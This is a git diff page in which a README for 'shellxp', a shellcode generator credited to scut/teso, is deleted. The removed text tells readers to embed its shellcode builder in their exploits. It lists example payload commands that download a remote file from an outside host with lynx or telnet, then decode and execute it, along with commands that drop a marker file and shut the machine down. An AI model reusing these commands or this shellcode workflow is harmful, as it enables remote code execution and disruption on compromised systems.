diff options
Diffstat (limited to 'other/shell/README')
| -rw-r--r-- | other/shell/README | 38 |
1 files changed, 0 insertions, 38 deletions
diff --git a/other/shell/README b/other/shell/README deleted file mode 100644 index b6fbeaa..0000000 --- a/other/shell/README +++ /dev/null | |||
| @@ -1,38 +0,0 @@ | |||
| 1 | |||
| 2 | gcc -o shellxp shellxp.c | ||
| 3 | |||
| 4 | ./shellxp commands ... | ||
| 5 | |||
| 6 | or to exec the generated shellcode | ||
| 7 | |||
| 8 | ./shellxp exec commands ... | ||
| 9 | |||
| 10 | |||
| 11 | either rip the sc_build routine into your exploits to directly create the | ||
| 12 | shellcode on the fly, or prepare it. | ||
| 13 | |||
| 14 | some examples: | ||
| 15 | |||
| 16 | ./shellxp /bin/sh -c "lynx -source 1.1.1.1/a>a;chmod +x a;./a" | ||
| 17 | ./shellxp /bin/sh -c "echo haha > /tmp/owned" | ||
| 18 | ./shellxp /sbin/shutdown -h now | ||
| 19 | |||
| 20 | or especially fancy ;-) | ||
| 21 | |||
| 22 | ./shellxp /bin/sh -c "((echo GET /test/ HTTP/1.0;echo;sleep 5)|telnet www.foo.org 80)|uudecode;/tmp/run.sh" | ||
| 23 | |||
| 24 | (where /test/index.html is an uuencoded file that will uudecode to an executeable /tmp/run.sh file) | ||
| 25 | modify the "sleep 5" to an appropiate value to allow the file to get retrieved :-) | ||
| 26 | |||
| 27 | (imagine some other fancy stuff in here :-) | ||
| 28 | ... | ||
| 29 | |||
| 30 | -scut/teso. | ||
| 31 | |||
| 32 | |||
| 33 | to modify the shellcode, use: | ||
| 34 | |||
| 35 | gcc -o shellcode shellcode.c sc.s | ||
| 36 | ./shellcode <-- will dump the code | ||
| 37 | ./shellcode foo <-- will dump and run the code | ||
| 38 | |||